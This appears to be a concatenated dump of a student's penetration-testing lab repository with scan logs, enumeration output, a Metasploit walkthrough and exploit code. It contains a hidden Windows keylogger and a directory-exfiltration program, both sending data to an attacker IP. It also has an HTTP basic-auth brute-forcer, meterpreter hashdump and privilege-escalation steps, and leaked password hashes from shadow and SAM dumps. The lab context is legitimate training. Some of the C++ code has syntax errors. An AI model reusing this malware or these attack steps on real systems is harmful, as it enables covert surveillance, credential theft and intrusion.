feedback:$6$oxHD8GmD$kGMV8tRl31iptNlU3kLM7Z9vrqSTqosZtjHseV.bFuRhrD9ZYUjxgYabUL2CaQYq6kChznrdyg1hk.L9om0eQ1:16470:0:99999:7::: dev:$6$MDKxgwuE$vnvMEnKF/CwtqC60XEdqQO07UTrIVV0IxNoaMl3uGQy37Gh9Dl5jbg0bbAOBon2Uslmzy28AcyO7xJafdd5iw0:16470:0:99999:7::: bryan:$6$ZFlofYYU$aWT3Ig1t7xYYrkIdZb..EUaYUrwGzLSVaKhy5IJtvFTQAKUi4xf8Ek8IU2KQf6Hj9YJBY7fpuSKW052ct/qmI.:16470:0:99999:7::: bruce:$6$bKYubhwp$8VamLKD7r3OWbnqn79l3HsuBf5X8YAR2cq6s5.Tparz2GK2dGThKQTchJ3ZHTmCV7VsJdZzqXRHiknQU2gaDf0:16470:0:99999:7::: qmailr:$6$ewnv7baU$vgPT5H27mTC1LPskTQlmkWug1puAoIeEpWhWY65.PDOIXk09unASmKIpgYCTGIGUpXyg6Y04Sswqo2shldi30/:16470:0:99999:7::: jamie:$6$hKrwJ2XL$K.VjPjTb0deFuo3YIhvypxHN9Wn952X2rIbhJ.t.5Gk9uO1vqt3NH5HEw2uPwPGMYSpuM4GzfXLEO9PKO2ZM//:16470:0:99999:7::: derek:$6$VRU46VG/$21FGTv71yuYyQ/7AtIzIqjV3GdHivvx7abiNlqe/QMffvF4NNAGRJ0cDL2eyWM2vPfIZZtcpn8P6XrcqqblYP/:16470:0:99999:7::: brandon:$6$OsORtNZ.$1Jr.wOnm6EonOFjMu7utgFiv5VT.K2Fbt0JehTIevXHom.if0w3QBWeMvXJ0BZHeA8TleiCkcozae1KOBlbHX.:16470:0:99999:7::: risks:$6$SoZjQEuS$Nxo6bfcqQGXW7Sj40Y/7OuG4KgKMzWROATWrJ6EfO9wk0FTqQXMv2Rx6Eml3p7i7s7YM/9S6wwA8hUtcQ9sRY0:16470:0:99999:7::: proberts:$6$ft8ebMmB$pZgSxqCWt9CxaAM7KrD9PTVJRVGFeAsm9mkWavvOYlErmnmYuo/qFYSLZ.jfgbfHEwq//nz67TK4MHRm6NemL0:16470:0:99999:7::: pierre:$6$jhaog97C$XVbyU2iMF0Fj8qMg0.PryFkhVctz50UTCzmtSvgYIJKtEzvfJ5XQ.V5aiGph2IjMOaUhSL1eDO8.sYSQDydGZ/:16470:0:99999:7::: pgo:$6$msJLJFAW$3yLybUn97UyvcxoV77JCoRS9IVcgPb5lMYNPgc2.bQKBrZvT3Qw48GroMnA.VPPdQlGHRKRL70bYDWa8HWJOX1:16470:0:99999:7::: maxim:$6$v4qWXFNW$xvrxBZ8gfF7fsbGJ3V94dew9bajgsxI62Ew0jM0GK/EGRVQmT6sNpEbcYzVuSK8U6ziH7R7pqWwC9Uja7eF5X0:16470:0:99999:7::: guest:$6$6vAGLPss$5Ciwdq3qSTSTfgtrqZ.cY9SI5AtZwHN/MBqIEIhCOJcmXKDik7Je47JvyjeAng01AcfsjEMatE4tzusDIcEwU0:16475:0:99999:7::: ================================================ FILE: ine-labs/dirbuster/alive_hosts.txt ================================================ 10.104.11.50 10.104.11.96 10.104.11.198 ================================================ FILE: ine-labs/dirbuster/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Thu Feb 18 13:45:12 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt Nmap scan report for 10.104.11.50 Host is up (0.00026s latency). All 1000 scanned ports on 10.104.11.50 are closed Nmap scan report for 10.104.11.96 Host is up (0.058s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Debian)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 10.104.11.198 Host is up (0.064s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) 3306/tcp open mysql MySQL 5.5.38-0+wheezy1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Feb 18 13:45:23 2021 -- 3 IP addresses (3 hosts up) scanned in 11.44 seconds ================================================ FILE: ine-labs/exploit-based-cpp/exploit.cpp ================================================ #define _WINSOCK_DEPRECATED_NO_WARNINGS #pragma comment(lib, "Ws2_32.lib") #include #include #include #include #include #include #define ATTACKER_IP "" SOCKET InitServer() { ShowWindow(GetConsoleWindow(), SW_HIDE); WSDATA wsaData; SOCKET server; // the socket to connect to SOCKADDR_IN addr; // holds connection details int result; // The WSAStartup function initiates use of the WS2_32.dll result = WSAStartup(MAKEWORD(2, 0), &WSAData); if (result != 0) { printf("WSAStartup failed with error code: %d\n", result); exit(result); } server = socket(AF_INET, SOCK_STREAM, 0); // establish TCP socket // manually add needed socket values; could instead use getaddrinfo() addr.sin_addr.s_addr = inet_addr(ATTACKER_IP); addr.sin_family = AF_INET; addr.sin_port = htons(5555); result = connect(server, (SOCKADDR *)&addr, sizeof(addr)); if (result = SOCKET_ERROR) server = INVALID_SOCKET; return server; } char *GetUserDirectory() { char *pPath = getenv("USERPROFILE"); if (pPath == NULL) { perror("getenv"); exit(1); } return pPath; } void SendData(SOCKET sockfd, char *buf) { int result = send(sockfd, buf, (int) strlen(buf), 0); if (result == SOCKET_ERROR) { printf("send failed: %d\n", WSAGetLastError()); closesocket(server); WSACleanup(); exit(1); } } int SendUserDirectory(SOCKET sockfd, const char *dirname) { DIR *dirp; struct dirent *entry; dirp = opendir(dirname); errno = 0; while ((entry = readdir(dirp)) != NULL) { SendData(sockfd, entry->d_name, (int) strlen(entry->d_name), 0); } // When an error is encountered, a null pointer is returned and errno // is set to indicate the error. When the end of the directory // is encountered, a null pointer is returned and errno is not changed. return errno; } int main() { SOCKET server; char *pPath = GetUserDirectory(); server = InitServer(); if (server == INVALID_SOCKET) { printf("Failed to connect!\n"); closesocket(server); WSACleanup(); return 1; } SendData(server, pPath); SendUserDirectory(server, pPath); // TODO error check closesocket(server); WSACleanup(); return 0; } ================================================ FILE: ine-labs/exploit-based-cpp/keylogger.cpp ================================================ #define _WINSOCK_DEPRECATED_NO_WARNINGS #pragma comment(lib, "Ws2_32.lib") #include #include #include #include #define ATTACKER_IP "10.0.2.15" int main() { ShowWindow(GetConsoleWindow(), SW_HIDE); char KEY; WSADATA WSAData; SOCKET server; SOCKADDR_IN addr; WSAStartup(MAKEWORD(2, 0), &WSAData); server = socket(AF_INET, SOCK_STREAM, 0); addr.sin_addr.s_addr = inet_addr(ATTACKER_IP) addr.sin_family = AF_INET; addr.sin_port = htons(5555); connect(server, (SOCKADDR *)&addr, sizeof(addr)); // collect the pressed keys while (true) { Sleep(10); // pause for 10 milliseconds // check if this is a printable key (keycodes defined by Microsoft) for (int KEY = 0x8; KEY < 0xFF; KEY++) { if (GetAsyncKeyState(KEY) == -32767) {// if key was pressed char buffer[2]; buffer[0] = KEY; send(server, buffer, sizeof(buffer), 0); } } } // cleanup closesocket(server); WSACleanup(); } ================================================ FILE: ine-labs/metasploit/README.md ================================================ # Metasploit Lab ## Description In this lab, you will have to use Metasploit and meterpreter against a real machine; this will help you become familiar with the Metasploit framework and its features. ## Goals - Identify the target machine on the network - Find a vulnerable service - Exploit the service by using Metasploit to get a meterpreter session - Gather information from the machine by using meterpreter commands - Retrieve the password hashes from the exploit machine - Search for a file named \"Congrats.txt\" ## Recon After connecting to the Hera Lab VPN, it is time to search for a vulnerable target. I used nmap for this: ``` $ nmap -sV -oN nmap_scan.txt 192.168.99.100/24 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-23 12:43 EST Nmap scan report for 192.168.99.12 Host is up (0.059s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp FreeFTPd 1.0 22/tcp open ssh WeOnlyDo sshd 2.1.8.98 (protocol 2.0) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp ``` From the scan we see that the IP address 192.168.99.12 has several services running on it. Time to open up metasploit and determine which service is vulnerable for exploit. ## Vulnerability Assessment Searching for the FreeFTPd service in msfconsole yields the following results: ``` msf6 > search FreeFTPd 1.0 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow 1 exploit/windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow 2 exploit/windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow ``` I chose the first exploit since it has the most recent disclosure data and higher rank. I left the default payload as windows/meterpreter/reverse_tcp shell. The only options we need to change are the remote and local hosts: ``` set RHOSTS 192.168.99.12 set LHOST 192.168.99.100 ``` ## Exploitation Run the exploit to spawn a meterpreter session. ### Cracking hashes Once inside meterpreter, run the hashdump command: ``` meterpreter> hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: eLSAdmin:1003:aad3b435b51404eeaad3b435b51404ee:87289513bddc269f9bcb24d74864beb2::: ftp:1004:4ff1ab31fc4b0ebdaad3b435b51404ee:9865c4bdcd9578a380297c5095e6c852::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0::: ``` I copied the output to a file named hashdump.txt and fed it to john: ``` $ john hashdump.txt ``` ### Escalate Privileges We can escalate our privileges with the getsystem command: ``` meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` ### Print Congrats.txt The Congrats.txt file can easily be found with the search command: ``` meterpreter > search -f Congrats.txt Found 1 result... c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt (64 bytes) meterpreter > cat "c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt" Congratulations! You have successfully exploited this machine! ``` ## Install a Backdoor ================================================ FILE: ine-labs/metasploit/hashdump.txt ================================================ Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: eLSAdmin:1003:aad3b435b51404eeaad3b435b51404ee:87289513bddc269f9bcb24d74864beb2::: ftp:1004:4ff1ab31fc4b0ebdaad3b435b51404ee:9865c4bdcd9578a380297c5095e6c852::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0::: ================================================ FILE: ine-labs/metasploit/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Tue Feb 23 12:43:57 2021 as: nmap -sV -oN nmap_scan.txt 192.168.99.100/24 Nmap scan report for 192.168.99.12 Host is up (0.059s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp FreeFTPd 1.0 22/tcp open ssh WeOnlyDo sshd 2.1.8.98 (protocol 2.0) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Nmap scan report for 192.168.99.100 Host is up (0.00030s latency). All 1000 scanned ports on 192.168.99.100 are closed Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Feb 23 12:44:13 2021 -- 256 IP addresses (2 hosts up) scanned in 15.93 seconds ================================================ FILE: ine-labs/nessus/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Thu Feb 18 12:17:44 2021 as: nmap -A -oN nmap_scan.txt 192.168.99.70/24 Nmap scan report for 192.168.99.50 Host is up (0.055s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds MAC Address: 00:50:56:A2:64:C8 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/18%OT=135%CT=1%CU=40956%PV=Y%DS=1%DC=D%G=Y%M=005056% OS:TM=602EA184%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II= OS:I%SS=S%TS=0)OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4 OS:=M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)WIN(W1=FFFF%W2=FFFF% OS:W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC OS:=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A= OS:S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NN OS:S%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=) OS:T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z) Network Distance: 1 hop Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 4h08m16s, deviation: 5h39m25s, median: 8m15s |_nbstat: NetBIOS name: ELS-WINXP, NetBIOS user: , NetBIOS MAC: 00:50:56:a2:64:c8 (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: els-winxp | NetBIOS computer name: ELS-WINXP\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2021-02-18T09:26:26-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE HOP RTT ADDRESS 1 54.90 ms 192.168.99.50 Nmap scan report for 192.168.99.70 Host is up (0.000048s latency). All 1000 scanned ports on 192.168.99.70 are closed Too many fingerprints match this host to give specific OS details Network Distance: 0 hops OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Feb 18 12:19:02 2021 -- 256 IP addresses (2 hosts up) scanned in 78.85 seconds ================================================ FILE: ine-labs/null-session/Congratulations.txt ================================================ Congratulations! You have successfully exploited a null session! ================================================ FILE: ine-labs/null-session/alive_hosts.txt ================================================ 192.168.99.100 192.168.99.162 ================================================ FILE: ine-labs/null-session/enum4linux_scan.txt ================================================ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 21 17:22:35 2021 ========================== | Target Information | ========================== Target ........... 192.168.99.162 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ====================================================== | Enumerating Workgroup/Domain on 192.168.99.162 | ====================================================== [+] Got domain/workgroup name: WORKGROUP ============================================== | Nbtstat Information for 192.168.99.162 | ============================================== Looking up status of 192.168.99.162 ELS-WINXP <00> - B Workstation Service WORKGROUP <00> - B Domain/Workgroup Name ELS-WINXP <20> - B File Server Service WORKGROUP <1e> - B Browser Service Elections WORKGROUP <1d> - B Master Browser ..__MSBROWSE__. <01> - B Master Browser MAC Address = 00-50-56-A0-46-C7 ======================================= | Session Check on 192.168.99.162 | ======================================= [+] Server 192.168.99.162 allows sessions using username '', password '' ============================================= | Getting domain SID for 192.168.99.162 | ============================================= Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================== | OS information on 192.168.99.162 | ======================================== [+] Got OS info for 192.168.99.162 from smbclient: [+] Got OS info for 192.168.99.162 from srvinfo: 192.168.99.162 Wk Sv NT PtB LMB platform_id : 500 os version : 5.1 server type : 0x51003 =============================== | Users on 192.168.99.162 | =============================== index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS Name: (null) Desc: (null) index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank Name: Frank Desc: (null) index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant Name: Remote Desktop Help Assistant Account Desc: Account for Providing Remote Assistance index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin Desc: (null) index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US Desc: This is a vendor's account for the Help and Support Service user:[Administrator] rid:[0x1f4] user:[eLS] rid:[0x3eb] user:[Frank] rid:[0x3ed] user:[Guest] rid:[0x1f5] user:[HelpAssistant] rid:[0x3e8] user:[netadmin] rid:[0x3ec] user:[SUPPORT_388945a0] rid:[0x3ea] =========================================== | Share Enumeration on 192.168.99.162 | =========================================== Sharename Type Comment --------- ---- ------- My Documents Disk IPC$ IPC Remote IPC Frank Disk C Disk WorkSharing Disk FrankDocs Disk ADMIN$ Disk Remote Admin C$ Disk Default share Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- [+] Attempting to map shares on 192.168.99.162 //192.168.99.162/IPC$ Mapping: OK Listing: DENIED //192.168.99.162/Frank Mapping: OK Listing: DENIED //192.168.99.162/C [E] Can't understand response: AUTOEXEC.BAT A 0 Thu Feb 12 19:50:47 2015 boot.ini HS 211 Thu Feb 12 19:46:17 2015 CONFIG.SYS A 0 Thu Feb 12 19:50:47 2015 Documents and Settings D 0 Wed Feb 18 04:25:58 2015 IO.SYS AHSR 0 Thu Feb 12 19:50:47 2015 MSDOS.SYS AHSR 0 Thu Feb 12 19:50:47 2015 NTDETECT.COM AHSR 47564 Tue Aug 3 13:08:34 2004 ntldr AHSR 250032 Tue Aug 3 13:29:34 2004 pagefile.sys AHS 805306368 Sun Feb 21 23:01:08 2021 Program Files DR 0 Mon Oct 3 12:10:27 2016 System Volume Information DHS 0 Thu Feb 12 19:54:12 2015 WINDOWS D 0 Mon Oct 3 12:12:49 2016 785224 blocks of size 4096. 304467 blocks available //192.168.99.162/WorkSharing Mapping: OK, Listing: OK //192.168.99.162/FrankDocs Mapping: OK Listing: DENIED //192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A //192.168.99.162/C$ Mapping: DENIED, Listing: N/A ====================================================== | Password Policy Information for 192.168.99.162 | ====================================================== [+] Attaching to 192.168.99.162 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:192.168.99.162) [+] Trying protocol 445/SMB... [+] Found domain(s): [+] ELS-WINXP [+] Builtin [+] Password Info for Domain: ELS-WINXP [+] Minimum password length: None [+] Password history length: None [+] Maximum password age: 42 days 22 hours 47 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 0 ================================ | Groups on 192.168.99.162 | ================================ [+] Getting builtin groups: group:[Administrators] rid:[0x220] group:[Backup Operators] rid:[0x227] group:[Guests] rid:[0x222] group:[Network Configuration Operators] rid:[0x22c] group:[Power Users] rid:[0x223] group:[Remote Desktop Users] rid:[0x22b] group:[Replicator] rid:[0x228] group:[Users] rid:[0x221] [+] Getting builtin group memberships: Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin Group 'Users' (RID: 545) has member: ELS-WINXP\Frank Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest [+] Getting local groups: group:[HelpServicesGroup] rid:[0x3e9] [+] Getting local group memberships: Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0 [+] Getting domain groups: group:[None] rid:[0x201] [+] Getting domain group memberships: Group 'None' (RID: 513) has member: ELS-WINXP\Administrator Group 'None' (RID: 513) has member: ELS-WINXP\Guest Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0 Group 'None' (RID: 513) has member: ELS-WINXP\eLS Group 'None' (RID: 513) has member: ELS-WINXP\netadmin Group 'None' (RID: 513) has member: ELS-WINXP\Frank ========================================================================= | Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050) | ========================================================================= [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-21-823518204-2025429265-839522115 [+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password '' [+] Enumerating users using SID S-1-5-32 and logon username '', password '' =============================================== | Getting printer info for 192.168.99.162 | =============================================== No printers returned. enum4linux complete on Sun Feb 21 17:25:39 2021 ================================================ FILE: ine-labs/null-session/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Sun Feb 21 17:08:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt Nmap scan report for 192.168.99.100 Host is up (0.00023s latency). All 1000 scanned ports on 192.168.99.100 are closed Nmap scan report for 192.168.99.162 Host is up (0.058s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Feb 21 17:08:41 2021 -- 2 IP addresses (2 hosts up) scanned in 8.95 seconds ================================================ FILE: ine-labs/practice/hello.php ================================================ Test PHP Hello World!

'; ?> ================================================ FILE: ine-labs/practice/index.html ================================================ Test PHP

Welcome to my custom web server!

================================================ FILE: ine-labs/practice/my-ls.sh ================================================ #!/bin/bash for i in $(ls); do echo "item: $i" done ================================================ FILE: ine-labs/practice/script.sh ================================================ #!/bin/bash x=444 y=321 if [ "$x" -eq "$y" ]; then echo "The values are equal!"; elif [ "$x" -lt "$y" ]; then echo "$x is less than $y" else echo "$x is greater than $y" fi ================================================ FILE: ine-labs/practice/sequences.sh ================================================ #!/bin/bash echo "Two ways to iterate over a sequence of numbers!" echo "option 1: use the seq command" for i in $(seq 1 10); do echo "$i"; done echo "option 2: use built-in braces {1..10}" for i in {1..10}; do echo "$i"; done ================================================ FILE: ine-labs/practice/shell.php ================================================ Simple PHP Shell
================================================ FILE: ine-labs/python-assisted-exploitation/brute-forcer.py ================================================ from bs4 import BeautifulSoup import requests def get_html(url): response = requests.get(url) html = response.text return html def parse_ids(html, id_name): """ Given HTML code, returns a list of values that have the id `id_name`. """ result = [] soup = BeautifulSoup(html, "html.parser") for item in soup.find_all(id=id_name): result.append(item.contents[0]) # Remove an duplicate entries result = list(set(result)) return result def attack(): # Scrape website for employee names and departments html = get_html("http://172.16.120.120") target = "http://172.16.120.120/admin.php" names = parse_ids(html, "name") departments = parse_ids(html, "department") # Attempt to login to "Admin Area" with name:department credential pair for name in names: for department in departments: response = requests.get(target, auth=(name, department)) if response.status_code != 401: print(f"Found successful login {name}:{department}") return if __name__ == "__main__": attack() ================================================ FILE: ine-labs/scanning-and-os-fingerprinting/fping_scan.txt ================================================ 10.142.111.1 10.142.111.6 10.142.111.48 10.142.111.96 10.142.111.99 10.142.111.100 10.142.111.240 ================================================ FILE: ine-labs/scanning-and-os-fingerprinting/nmap_ping_scan.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 17 22:20:54 2021 as: nmap -sn -oN nmap_ping_scan.txt 10.142.111.* Nmap scan report for 10.142.111.1 Host is up (0.056s latency). Nmap scan report for 10.142.111.6 Host is up (0.057s latency). Nmap scan report for 10.142.111.48 Host is up (0.057s latency). Nmap scan report for 10.142.111.96 Host is up (0.056s latency). Nmap scan report for 10.142.111.99 Host is up (0.056s latency). Nmap scan report for 10.142.111.100 Host is up (0.056s latency). Nmap scan report for 10.142.111.213 Host is up (0.060s latency). Nmap scan report for 10.142.111.240 Host is up (0.024s latency). # Nmap done at Wed Feb 17 22:20:57 2021 -- 256 IP addresses (8 hosts up) scanned in 3.23 seconds ================================================ FILE: ine-labs/scanning-and-os-fingerprinting/nmap_syn_scan.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 17 22:22:53 2021 as: nmap -sS -iL fping_scan.txt -oN nmap_syn_scan.txt Nmap scan report for 10.142.111.1 Host is up (0.057s latency). Not shown: 997 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http MAC Address: 00:50:56:A0:23:42 (VMware) Nmap scan report for 10.142.111.6 Host is up (0.055s latency). Not shown: 999 closed ports PORT STATE SERVICE 22/tcp open ssh MAC Address: 00:50:56:A0:B1:71 (VMware) Nmap scan report for 10.142.111.48 Host is up (0.056s latency). Not shown: 996 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server MAC Address: 00:50:56:A0:57:E5 (VMware) Nmap scan report for 10.142.111.96 Host is up (0.057s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http MAC Address: 00:50:56:A0:1C:4F (VMware) Nmap scan report for 10.142.111.99 Host is up (0.063s latency). Not shown: 997 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http MAC Address: 00:50:56:A0:E5:3E (VMware) Nmap scan report for 10.142.111.100 Host is up (0.056s latency). All 1000 scanned ports on 10.142.111.100 are closed MAC Address: 00:50:56:A0:1C:4F (VMware) Nmap scan report for 10.142.111.240 Host is up (0.000020s latency). All 1000 scanned ports on 10.142.111.240 are closed # Nmap done at Wed Feb 17 22:23:07 2021 -- 7 IP addresses (7 hosts up) scanned in 14.32 seconds ================================================ FILE: ine-labs/scanning-and-os-fingerprinting/nmap_version_and_os.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 17 22:24:04 2021 as: nmap -O -sV -iL fping_scan.txt -oN nmap_version_and_os.txt Nmap scan report for 10.142.111.1 Host is up (0.055s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0) 53/tcp open domain dnsmasq 2.55 80/tcp open http lighttpd 1.4.29 MAC Address: 00:50:56:A0:23:42 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|specialized|media device Running (JUST GUESSING): OpenBSD 4.X|3.X|5.X (94%), FreeBSD 7.X|9.X (87%), Comau embedded (86%), Apple Apple TV 5.X (85%) OS CPE: cpe:/o:openbsd:openbsd:4.3 cpe:/o:freebsd:freebsd:7.0 cpe:/o:openbsd:openbsd:3 cpe:/o:openbsd:openbsd:4 cpe:/a:apple:apple_tv:5.2.1 cpe:/a:apple:apple_tv:5.3 cpe:/o:freebsd:freebsd:9.1 Aggressive OS guesses: OpenBSD 4.3 (94%), FreeBSD 7.0-RELEASE (87%), Comau C4G robot control unit (86%), OpenBSD 3.8 - 4.7 (85%), OpenBSD 4.1 (85%), OpenBSD 4.9 - 5.1 (85%), OpenBSD 5.2 (85%), Apple TV 5.2.1 or 5.3 (85%), FreeBSD 9.1-PRERELEASE (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Nmap scan report for 10.142.111.6 Host is up (0.054s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) MAC Address: 00:50:56:A0:27:7E 